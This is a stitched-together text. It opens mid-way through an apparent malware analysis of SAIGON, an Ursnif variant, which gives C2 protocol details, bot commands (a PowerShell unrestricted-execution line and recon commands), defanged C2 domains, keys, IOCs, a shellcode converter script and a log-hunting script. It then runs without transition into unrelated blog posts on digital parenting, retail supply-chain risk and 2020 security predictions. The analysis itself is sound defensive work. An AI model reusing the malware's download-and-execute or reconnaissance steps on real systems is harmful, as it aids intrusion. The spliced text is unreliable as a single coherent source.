| 0x776c71c0 | IdlePeriod | Number of seconds to wait before the initial request to the C2 |
| 0x22aa2818 | MinimumUptime | Waits until the uptime is greater than this value (in seconds) |
| 0x5beb543e | LoadPeriod | Number of seconds to wait between subsequent requests to the C2 |
| 0x84485ef2 | HostKeepTime | The number of minutes to wait before switching to the next C2 server in case of failures |

Table 1: Configuration options

Communication

While the network communication structure of SAIGON is very similar to Ursnif v3, there are some subtle differences. SAIGON beacons are sent to the C2 servers as multipart/form-data encoded requests via HTTP POST to the "/index.html" URL path. The payload to be sent is first encrypted using Serpent (in ECB mode, rather than the CBC mode used by Ursnif v3), then Base64-encoded. Responses from the server are encrypted with the same Serpent key and signed with the server's RSA private key.

SAIGON uses the following User-Agent header in its HTTP requests: "Mozilla/5.0 (Windows NT <os_version>; rv:58.0) Gecko/20100101 Firefox/58.0," where <os_version> consists of the operating system's major and minor version number (e.g. 10.0 on Windows 10, and 6.1 on Windows 7) and the string "; Win64; x64" is appended when the operating system is 64-bit. This yields the following example User Agent strings:

  • "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" on Windows 10 64-bit
  • "Mozilla/5.0 (Windows NT 6.1; rv:58.0) Gecko/20100101 Firefox/58.0" on Windows 7 32-bit

The request format is also somewhat similar to the one used by other Ursnif variants described in Table 2:

ver=%u&group=%u&id=%08x%08x%08x%08x&type=%u&uptime=%u&knock=%u

| Name | Description |
| --- | --- |
| ver | Bot version (unlike other Ursnif variants this only contains the build number, so only the xxx digits from "3.5.xxx") |
| group | Botnet ID |
| id | Client ID |
| type | Request type (0 – when polling for tasks, 6 – for system info data uploads) |
| uptime | Machine uptime in seconds |
| knock | The bot "knock" period (number of seconds to wait between subsequent requests to the C2, see the LoadPeriod configuration option) |

Table 2: Request format components
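The network traits above can be combined into one hunt over proxy logs, since the Firefox 58 User-Agent on its own also matches genuine browsers. This is an added example, not part of the original report: the JSON log schema, field names, hosts and log lines are constructed, and the 10% jitter tolerance is an assumption.

```python
import json
import re
from collections import defaultdict
from statistics import median

# User-Agent template from the text; "; Win64; x64" appears only on 64-bit hosts.
UA_RE = re.compile(
    r"^Mozilla/5\.0 \(Windows NT \d+\.\d+(?:; Win64; x64)?; rv:58\.0\) "
    r"Gecko/20100101 Firefox/58\.0$"
)


def matches_beacon_traits(rec: dict) -> bool:
    """True when a single request shows every network trait listed in the text."""
    return (
        rec.get("method") == "POST"
        and rec.get("path") == "/index.html"
        and str(rec.get("ctype", "")).lower().startswith("multipart/form-data")
        and UA_RE.match(str(rec.get("ua", ""))) is not None
    )


def find_beacons(log_lines, min_hits=3, jitter=0.10):
    """Group trait matches by (src, host) and test them for a fixed polling period.

    Returns one dict per (src, host) pair with at least one match. "period" is
    the median gap in seconds when the requests are evenly spaced (the bot
    polls every LoadPeriod seconds), otherwise None.
    """
    by_pair = defaultdict(list)
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines instead of aborting the hunt
        if isinstance(rec, dict) and matches_beacon_traits(rec):
            key = (str(rec.get("src", "")), str(rec.get("host", "")))
            by_pair[key].append(float(rec.get("ts", 0)))

    findings = []
    for (src, host), stamps in sorted(by_pair.items()):
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        period = None
        if len(stamps) >= max(min_hits, 2):
            mid = median(gaps)
            if mid > 0 and all(abs(g - mid) <= jitter * mid for g in gaps):
                period = mid
        findings.append({"src": src, "host": host,
                         "hits": len(stamps), "period": period})
    return findings


# ---- constructed sample data (not taken from any real log) ----
FF58_X64 = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) "
            "Gecko/20100101 Firefox/58.0")
FF58_W7 = "Mozilla/5.0 (Windows NT 6.1; rv:58.0) Gecko/20100101 Firefox/58.0"
CHROME = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
          "(KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36")


def make_line(ts, src, method, host, path, ua, ctype):
    return json.dumps({"ts": ts, "src": src, "method": method, "host": host,
                       "path": path, "ua": ua, "ctype": ctype})


SAMPLE_LOG = [
    # regular polling roughly every 300 seconds with all traits present
    make_line(1000, "10.0.0.5", "POST", "c2.example", "/index.html", FF58_X64,
              "multipart/form-data; boundary=x1"),
    make_line(1300, "10.0.0.5", "POST", "c2.example", "/index.html", FF58_X64,
              "multipart/form-data; boundary=x2"),
    make_line(1601, "10.0.0.5", "POST", "c2.example", "/index.html", FF58_X64,
              "multipart/form-data; boundary=x3"),
    make_line(1899, "10.0.0.5", "POST", "c2.example", "/index.html", FF58_X64,
              "multipart/form-data; boundary=x4"),
    # genuine Firefox 58 browsing: same User-Agent, but a GET request
    make_line(1010, "10.0.0.9", "GET", "intranet.example", "/index.html",
              FF58_X64, ""),
    # form upload to /index.html from a different browser
    make_line(1020, "10.0.0.9", "POST", "forms.example", "/index.html", CHROME,
              "multipart/form-data; boundary=y1"),
    # all traits match, but a single request cannot establish a period
    make_line(2000, "10.0.0.7", "POST", "c2.example", "/index.html", FF58_W7,
              "multipart/form-data; boundary=z1"),
    "not json at all",
]

if __name__ == "__main__":
    for finding in find_beacons(SAMPLE_LOG):
        print(finding)
```

Pairs that report a period are the strongest leads; a pair with hits but no period still shows the full trait combination and deserves a look at the endpoint.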

Capabilities

SAIGON implements the bot commands described in Table 3.

| Name Checksum | Name | Description |
| --- | --- | --- |
| 0x45d4bf54 | SELF_DELETE | Uninstalls itself from the machine; removes scheduled task and deletes its registry key |
| 0xd86c3bdc | LOAD_UPDATE | Download data from URL, decrypt and verify signature, save it as a .ps1 file and run it using "PowerShell.exe -ep unrestricted -file %s" |
| 0xeac44e42 | GET_SYSINFO | Collects and uploads system information by running: 1. "systeminfo.exe"; 2. "net view"; 3. "nslookup 127.0.0.1"; 4. "tasklist.exe /SVC"; 5. "driverquery.exe"; 6. "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s" |
| 0x83bf8ea0 | LOAD_DLL | Download data from URL, decrypt and verify, then use the same shellcode loader that was used to load itself into memory to load the DLL into the current process |
| 0xa8e78c43 | LOAD_EXE | Download data from URL, decrypt and verify, save with an .exe extension, invoke using ShellExecute |

Table 3: SAIGON bot commands

Comparison to Ursnif v3

Table 4 shows the similarities between Ursnif v3 and the analyzed SAIGON samples (differences are highlighted in bold):

| | Ursnif v3 (RM3) | Saigon (Ursnif v3.5?) |
| --- | --- | --- |
| Persistence method | Scheduled task that executes code stored in a registry key using PowerShell | Scheduled task that executes code stored in a registry key using PowerShell |
| Configuration storage | Security PE directory points to embedded binary data starting with 'WD' magic bytes (aka. Ursnif "joined files") | Security PE directory points to embedded binary data starting with 'WD' magic bytes (aka. Ursnif "joined files") |
| PRNG algorithm | xorshift64* | xorshift64* |
| Checksum algorithm | JAMCRC (aka. CRC32 with all the bits flipped) | CRC32, with the result rotated to the right by 1 bit |
| Data compression | aPLib | aPLib |
| Encryption/Decryption | Serpent CBC | Serpent ECB |
| Data integrity verification | RSA signature | RSA signature |
| Communication method | HTTP POST requests | HTTP POST requests |
| Payload encoding | Unpadded Base64 ('+' and '/' are replaced with '_2B' and '_2F' respectively), random slashes are added | Unpadded Base64 ('+' and '/' are replaced with '%2B' and '%2F' respectively), no random slashes |
| Uses URL path mimicking? | Yes | No |
| Uses PX file format? | Yes | No |

Table 4: Similarities and differences between Ursnif v3 and SAIGON samples

Figure 4 shows Ursnif v3's use of URL path mimicking. This tactic has not been seen in other Ursnif variants, including SAIGON.


Figure 4: Ursnif v3 mimicking (red) previously seen benign browser traffic (green) not seen in SAIGON samples 

Implications

It is currently unclear whether SAIGON is representative of a broader evolution in the Ursnif malware ecosystem. The low number of SAIGON samples identified thus far—all of which have compilation timestamps in 2018—may suggest that SAIGON was a temporary branch of Ursnif v3 adapted for use in a small number of operations. Notably, SAIGON’s capabilities also distinguish it from typical banking malware and may be more suited toward supporting targeted intrusion operations. This is further supported by our prior identification of SAIGON on a server that hosted tools used in point-of-sale intrusion operations, as well as by VISA’s recent notification of the malware appearing on a compromised hospitality organization’s network along with tools previously used by FIN8.

Acknowledgements

The authors would like to thank Kimberly Goody, Jeremy Kennelly and James Wyke for their support on this blog post.

Appendix A: Samples

The following is a list of samples including their embedded configuration:

Sample SHA256: 8ded07a67e779b3d67f362a9591cce225a7198d2b86ec28bbc3e4ee9249da8a5
Sample Version: 3.50.132
PE Timestamp: 2018-07-07T14:51:30
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com

Group / Botnet ID: 1001
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 30
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b1502ccb5c
021c565359255265e0ca015290112f3b6cb72c7863309480f749e38b7d955e410cb53fb3ecf7c403f593518a2cf4915
d0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: c6a27a07368abc2b56ea78863f77f996ef4104692d7e8f80c016a62195a02af6
Sample Version: 3.50.132
PE Timestamp: 2018-07-07T14:51:41
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com

Group / Botnet ID: 1001
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 30
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b1502ccb5c
021c565359255265e0ca015290112f3b6cb72c7863309480f749e38b7d955e410cb53fb3ecf7c403f593518a2cf4915
d0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: 431f83b1af8ab7754615adaef11f1d10201edfef4fc525811c2fcda7605b5f2e
Sample Version: 3.50.199
PE Timestamp: 2018-11-15T11:17:09
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://mozilla-yahoo[.]com
  • https://cdn-mozilla-sn45[.]com
  • https://cdn-digicert-i31[.]com

Group / Botnet ID: 1000
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 60
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b15
02ccb5c021c565359255265e0ca015290112f3b6cb72c7863309480f749e38b7d955e410cb53fb3ecf7c403f5
93518a2cf4915d0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: 628cad1433ba2573f5d9fdc6d6ac2c7bd49a8def34e077dbbbffe31fb6b81dc9
Sample Version: 3.50.209
PE Timestamp: 2018-12-04T10:47:56
XOR Cookie: 0x40d822d9
C2 URLs:

  • http://softcloudstore[.]com
  • http://146.0.72.76
  • http://setworldtime[.]com
  • https://securecloudbase[.]com

Botnet ID: 1000
Server Key: 0123456789ABCDEF
Idle Period: 20
Minimum Uptime: 300
Load Period: 1800
Host Keep Time: 360
RSA Public Key: (0xdb7c3a9ea68fbaf5ba1aebc782be3a9e75b92e677a114b52840d2bbafa8ca49da40a64664d80cd62d9453
34f8457815dd6e75cffa5ee33ae486cb6ea1ddb88411d97d5937ba597e5c430a60eac882d8207618d14b660
70ee8137b4beb8ecf348ef247ddbd23f9b375bb64017a5607cb3849dc9b7a17d110ea613dc51e9d2aded, 0x10001)

Appendix B: IOCs

User-Agent:

  • "Mozilla/5.0 (Windows NT <os_version>; rv:58.0) Gecko/20100101 Firefox/58.0"

Other host-based indicators:

  • "Power<random_string>" scheduled task
  • "PsRun" value under the HKCU\Identities\{<random_guid>} registry key

Appendix C: Shellcode Converter Script

The following Python script is intended to ease analysis of this malware. This script converts the SAIGON shellcode blob back into its original DLL form by removing the PE loader and restoring its PE header. These changes make the analysis of SAIGON shellcode blobs much simpler (e.g. they allow the files to be loaded in IDA). However, the created DLLs will still crash when run in a debugger, as the malware still relies on its (now removed) PE loader during the process injection stage of its execution. After this conversion process, the sample is relatively easy to analyze due to its small size and because it is not obfuscated.

#!/usr/bin/env python3
import argparse
import struct
from datetime import datetime

MZ_HEADER = bytes.fromhex(
    '4d5a90000300000004000000ffff0000'
    'b8000000000000004000000000000000'
    '00000000000000000000000000000000'
    '00000000000000000000000080000000'
    '0e1fba0e00b409cd21b8014ccd215468'
    '69732070726f6772616d2063616e6e6f'
    '742062652072756e20696e20444f5320'
    '6d6f64652e0d0d0a2400000000000000'
)

def main():
    parser = argparse.ArgumentParser(description="Shellcode to PE converter for the Saigon malware family.")
    parser.add_argument("sample")
    args = parser.parse_args()

    with open(args.sample, "rb") as f:
        data = bytearray(f.read())

    if data.startswith(b'MZ'):
        # Nothing to convert: the input already carries a DOS/PE header.
        print('This is already an MZ/PE file.')
        return
    elif not data.startswith(b'\xe9'):
        print('Unknown file type.')
        return

    struct.pack_into('=I', data, 0, 0x00004550)
    if data[5] == 0x01:
        struct.pack_into('=H', data, 4, 0x14c)
    elif data[5] == 0x86:
        struct.pack_into('=H', data, 4, 0x8664)
    else:
        print('Unknown architecture.')
        return

    # file alignment
    struct.pack_into('=I', data, 0x3c, 0x200)

    optional_header_size, _ = struct.unpack_from('=HH', data, 0x14)
    magic, _, _, size_of_code = struct.unpack_from('=HBBI', data, 0x18)
    print('Magic:', hex(magic))
    print('Size of code:', hex(size_of_code))

    base_of_code, base_of_data = struct.unpack_from('=II', data, 0x2c)

    if magic == 0x20b:
        # base of data, does not exist in PE32+
        if size_of_code & 0x0fff:
            tmp = (size_of_code & 0xfffff000) + 0x1000
        else:
            tmp = size_of_code
        base_of_data = base_of_code + tmp

    print('Base of code:', hex(base_of_code))
    print('Base of data:', hex(base_of_data))

    data[0x18 + optional_header_size : 0x1000] = b'\0' * (0x1000 - 0x18 - optional_header_size)

    size_of_header = struct.unpack_from('=I', data, 0x54)[0]

    data_size = 0x3000
    pos = data.find(struct.pack('=IIIII', 3, 5, 7, 11, 13))
    if pos >= 0:
        data_size = pos - base_of_data

    section = 0
    struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
        b'.text',
        size_of_code, base_of_code,
        base_of_data - base_of_code, size_of_header,
        0, 0,
        0, 0,
        0x60000020
    )
    section += 1
    struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
        b'.rdata',
        data_size, base_of_data,
        data_size, size_of_header + base_of_data - base_of_code,
        0, 0,
        0, 0,
        0x40000040
    )
    section += 1
    struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
        b'.data',
        0x1000, base_of_data + data_size,
        0x1000, size_of_header + base_of_data - base_of_code + data_size,
        0, 0,
        0, 0,
        0xc0000040
    )

    if magic == 0x20b:
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.pdata',
            0x1000, base_of_data + data_size + 0x1000,
            0x1000, size_of_header + base_of_data - base_of_code + data_size + 0x1000,
            0, 0,
            0, 0,
            0x40000040
        )
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.bss',
            0x1600, base_of_data + data_size + 0x2000,
            len(data[base_of_data + data_size + 0x2000:]), size_of_header + base_of_data - base_of_code + data_size + 0x2000,
            0, 0,
            0, 0,
            0xc0000040
        )
    else:
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.bss',
            0x1000, base_of_data + data_size + 0x1000,
            0x1000, size_of_header + base_of_data - base_of_code + data_size + 0x1000,
            0, 0,
            0, 0,
            0xc0000040
        )
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.reloc',
            0x2000, base_of_data + data_size + 0x2000,
            len(data[base_of_data + data_size + 0x2000:]), size_of_header + base_of_data - base_of_code + data_size + 0x2000,
            0, 0,
            0, 0,
            0x40000040
        )

    header = MZ_HEADER + data[:size_of_header - len(MZ_HEADER)]
    pe = bytearray(header + data[0x1000:])
    with open(args.sample + '.dll', 'wb') as f:
        f.write(pe)

    lfanew = struct.unpack_from('=I', pe, 0x3c)[0]
    timestamp = struct.unpack_from('=I', pe, lfanew + 8)[0]
    print('PE timestamp:', datetime.utcfromtimestamp(timestamp).isoformat())


if __name__ == "__main__":
    main()

Lessons Learned: A Decade of Digital Parenting

Give yourself a high-five, parents. Pour yourself a cup of coffee or your favorite celebratory drink and sip it slow — real slow. Savor the wins. Let go of the misses. Appreciate the lessons learned. You’ve come a long way in the last decade of raising digital kids, and not all of it has been easy.

As we head into 2020, we’re tossing parenting resolutions (hey, it’s a victory to make it through a week let alone a year!). Instead, we’re looking back over the digital terrain we’ve traveled together and lessons learned. Need a refresher? Here’s a glimpse of how technology has impacted the family over the past decade.

In the last decade

• Smartphone, social, gaming growth. Social media and gaming platforms have exploded to usage and influence levels no one could have imagined. Smartphone ownership has increased, and as of 2019, 81% of adults own a smartphone and 72% use social media, 53% of kids own a smartphone by the age of 11, and 84% of teenagers have phones.

• Video platform growth. Video platforms like YouTube have become the go-to for teens and tweens who spend nearly three hours a day watching videos online.

• Streaming news. Smartphones have made it possible for all of us to carry (and stream) the world in our pockets. In 2018, for the first time, social media sites surpassed print newspapers as a news source for Americans.

• Dating apps dominate. We’re hooking up, dating, and marrying using apps. A Stanford study found that “heterosexual couples are more likely to meet a romantic partner online than through personal contacts and connections.”

• The rise of the Influencer. Internet influencers and celebrities have reached epic levels of fame, wealth, and reach, creating an entire industry of vloggers, gamers, micro and niche-influencers, and others who have become “instafamous.”

• Lexicon changes. Every day, technology is adding terms to our lexicon that didn’t exist a decade ago such as selfie, OMG, streaming, bae, fake news, the cloud, wearables, finsta, influencers, emojis, tracking apps, catfish, digital shaming, screen time, cryptojacking, FOMO, and hashtag, along with hundreds of others.

What we’ve learned (often the hard way)

Most people, if polled, would say technology has improved daily life in incalculable ways. But ask a parent of a child between five and 18 the same question, and the response may not be as enthusiastic. Here are some lessons we’ve learned the hard way.

Connection brings risk. We’ve learned that with unprecedented connection comes equally unprecedented risk. Everyday devices plug our kids directly into the potential for cyberbullying, sexting, inappropriate content, and mental health issues.  Over the past decade, parents, schools, and leaders have worked to address these risks head-on but we have a long way to go in changing the online space into an emotionally safe and healthy place.

Tech addiction isn’t a myth.  To curb the negative impact of increased tech use, we’ve learned ways to balance and limit screen time, unplug, and digitally detox. Most importantly, it’s been confirmed that technology addiction is a medical condition that’s impacting people and families in very painful ways.

The internet remembers. We’ve witnessed the very public consequences of bad digital choices. Kids and adults have wrecked scholarships, reputations, and careers due to careless words or content shared online. Because of these cases, we’re learning — though never fast enough — to think twice about the behaviors and words we share.

We’re equipping vs. protecting. We’ve gone from monitoring our kids aggressively and freaking out over headlines to realizing that we can’t put the internet in a bottle and follow our kids 24/7. We’ve learned that relevant, consistent conversation, adding an extra layer of protection with security software, and taking the time to understand (not just monitor) the ways our kids use new apps, is the best way to equip them for digital life.

The parent-child relationship is #1. When it comes to raising savvy digital kids and keeping them safe, there’s not a monitoring plan in existence that rivals a strong parent-child relationship. If you’ve earned your child’s heart, mind, and respect, you have his or her attention and can equip them daily to make wise choices online.

The dark web is . . . unimaginably dark. The underbelly of the internet — the encrypted, anonymous terrain known as the Dark Web — has moved from covert to mainstream exposure. We’ve learned the hard way the degree of sophistication with which criminals engage in pornography, human trafficking, drug and weapon sales, and stolen data. With more knowledge, the public is taking more precautions especially when it comes to malware, phishing scams, and virus attacks launched through popular public channels.

There’s a lot of good going on. As much negative as we’ve seen and experienced online over the past decade, we’ve also learned that its power can be used equally to amplify the best of humanity. Social media has sparked social movements, helped first responders and brought strangers together in times of tragedy like no other medium in history.

Privacy is (finally) king. Ten years ago, we clicked on every link that came our way and wanted to share every juicy detail about our personal lives. We became publishers and public figures overnight and readily gave away priceless chunks of our privacy. The evolution and onslaught of data breaches, data mining, and malicious scams have educated us to safeguard our data and privacy like gold.

We’ve become content curators. The onslaught of fake news, photo apps, and filter bubbles have left our heads spinning and our allegiances confused. In the process, we’ve learned to be more discerning with the content we consume and share. While we’re not there yet, our collective digital literacy is improving as our understanding of various types of content grows.

Parents have become digital ninjas. The parenting tasks of monitoring, tracking, and keeping up with kids online have gone from daunting to doable for most parents. With the emotional issues now connected to social media, most parents don’t have the option of sitting on the sidelines and have learned to track their kids better than the FBI.

This is us

We’ve learned that for better or worse, this wired life is us. There’s no going back. Where once there may have been doubt a decade ago, today it’s clear we’re connected forever. The internet has become so deep-seated in our culture and homes that unplugging completely for most of us is no longer an option without severe financial (and emotional) consequences. The task ahead for this new decade? To continue working together to diminish the ugly side of technology — the bullying, the cruelty, the crime — and make the internet a safe, fun experience for everyone.

The post Lessons Learned: A Decade of Digital Parenting appeared first on McAfee Blogs.

How the Cyber Grinch Stole Christmas: Managing Retailer Supply Chain Cyber Risk

Cyber threats are always a prominent risk to businesses, especially those in the retail space that hold large quantities of customer information: over 50% of global retailers were breached last year. BitSight VP Jake Olcott has written guidance for retailers on how to manage their supply-chain cyber risk in four simple steps, to help prevent the 'Cyber Grinch' from stealing not just Christmas but the rest of the year too.


Cyber risk in retail is not a new concept. Retail is one of the most targeted industries when it comes to cyber-attacks. In fact, over 50% of global retailers were breached in the last year. Given the sensitive customer data these organizations often possess — like credit card information and personally identifiable information (PII) – it’s not surprising that attackers have been capitalizing on the industry for decades.

The Christmas shopping season can increase retailers’ cyber risk, with bad actors looking to take advantage of the massive surge of in-store and online shoppers that comes with it. What is important for retailers to keep in mind is that it’s not only their own network they have to worry about when it comes to mitigating cyber risk, but their entire supply chain ecosystem – from shipping distributors and production partners to point-of-sale technologies and beyond.

Take for example the infamous 2017 NotPetya attack that targeted large electric utilities, but actually ended up stalling operations for many retailers as a result. This nation-state attack had a snowball effect, wreaking havoc on shipping companies like FedEx and Maersk who are responsible for delivering many retail orders. FedEx operations were reduced to manual processes for pick-up, sort and delivery, and Maersk saw infections in part of its corporate network that paralyzed some systems in its container business and prevented retail customers from booking ships and receiving quotes.

For retailers, a cyber disruption in the supply chain can fundamentally disrupt operations, causing catastrophic harm to brand reputation and financial performance as well as regulatory repercussions – and the stakes are even higher during the make-or-break holiday sales period.

Here are some important steps retailers can take now to mitigate supply chain cyber risk this holiday season and beyond.

Step 1: Inventory your Supply Chain
A business today relies on an average of 89 vendors a week that have access to its network in order to perform various crucial business tasks. As outsourcing and cloud adoption continue to rise across retail organizations, it is critical that they keep an up-to-date catalogue of every third party and service provider in the digital (or brick-and-mortar) supply chain and their network access points. These supply chain ecosystems can be massive, but previous examples have taught us that security issues impacting any individual organization can potentially disrupt the broader system.

An inventory of vendors and the systems they have access to allows security teams to keep track of all possible paths a cybercriminal may exploit and can help them better identify vulnerabilities and improve response time in the event of an incident.

Step 2: Take control of your Third-Party Accounts
Once you have a firm grasp of the supply chain, a critical focus should be to identify and manage any network accounts held by these organizations. While some suppliers may need access to complete their daily tasks, this shouldn’t mean handing them a full set of keys to the kingdom on their terms.

Retailers should ensure each vendor has an email account and credentials affiliated and managed by the retailer – not by the supplier organization and certainly not the user themselves. By taking this step, the retailer can ensure they are the first point of notification if and when an incident occurs and are in full control over the remediation process.


Step 3: Assess your Suppliers’ Security Posture
Retail security teams often conduct regular internal audits to evaluate their own security posture but fail to do so effectively when it comes to their supply chain relationships.

While a supplier’s security posture doesn’t necessarily indicate that their products and services contain security flaws, in the cyber world, where there’s smoke, there’s eventually fire. Poor security performance can be indicative of bad habits that could lead to increased vulnerability and risk exposure.

Having clear visibility into supplier security performance can help retailers quickly pinpoint security vulnerabilities and cyber incidents, while significantly speeding up communication and action to address the security concern at hand.

Step 4: Continuously Monitor for Changes
Third-party security performance assessment should not be treated as a one-and-done item on the supply chain management checklist.

The cyber threat landscape is volatile and ever-evolving, with new vulnerabilities and attack vectors cropping up virtually every day. That means retailers need solutions and strategies in place that provide a real-time, continuous and measurable pulse check of supplier security posture to ensure they are on top of potential threats before they impact the business and its customers.

Just as retailers track billions of packages and shipments in real-time to ensure there are no mistakes or bumps in the road, their vendor risk management program should be treated with the same due care.

This holiday season and beyond, it is critical that retailers invest in supply chain security management to reduce the risk of data breaches, slowdowns, and outages – and the costs and reputational damage that come along with them. After all, retailers are only as secure as their weakest third-party.

Accelerated Digital Innovation to impact the Cybersecurity Threat Landscape in 2020

It's December and the Christmas lights are going up, so it can't be too early for cyber predictions for 2020. With this in mind, Richard Starnes, Chief Security Strategist at Capgemini, sets out what the priorities will be for businesses in 2020 and beyond.


Accelerated digital innovation is a double-edged sword that will continue to hang over the cybersecurity threat landscape in 2020.  As businesses rapidly chase digital transformation and pursue the latest advancements in 5G, cloud and IoT, they do so at the risk of exposing more of their operations to cyber-attacks. These technologies have caused an explosion in the number of end-user devices, user interfaces, networks and data; the sheer scale of which is a headache for any cybersecurity professional. 

In order to aggressively turn the tide next year, cyber analysts can no longer avoid AI adoption or ignore the impact of 5G. 

AI Adoption
Hackers are already using AI to launch sophisticated attacks – for example, AI algorithms can send ‘spear phishing’ tweets six times faster than a human and with twice the success. In 2020, by deploying intelligent, predictive systems, cyber analysts will be better positioned to anticipate the exponentially growing number of threats.

The Convergence of IT and OT
At the core of the Industry 4.0 trend is the convergence of operations technology (OT) and information technology (IT) networks, i.e. the convergence of industrial and traditional corporate IT systems. While the union of these formerly disparate networks certainly facilitates data exchange and enables organisations to improve business efficiency, it also comes with a host of new security concerns.

5G and IoT
While 5G promises faster speed and bandwidth for connections, it also comes with a new generation of security threats. 5G is expected to make more IoT services possible and the framework will no longer neatly fit into the traditional security models optimised for 4G. Security experts warn of threats related to the 5G-led IoT growth anticipated in 2020, such as a heightened risk of Distributed Denial-of-Service (DDoS) attacks.

Death of the Password
2020 could see organisations adopt new and sophisticated technologies to combat risks associated with weak passwords.

More Power to Data Protection Regulations
In 2020, regulations like GDPR, The California Consumer Privacy Act and PSD2 are expected to get harsher. We might also see announcements of codes of conduct specific to different business sectors like hospitality, aviation etc. All this will put pressure on businesses to make data security a top consideration at the board level.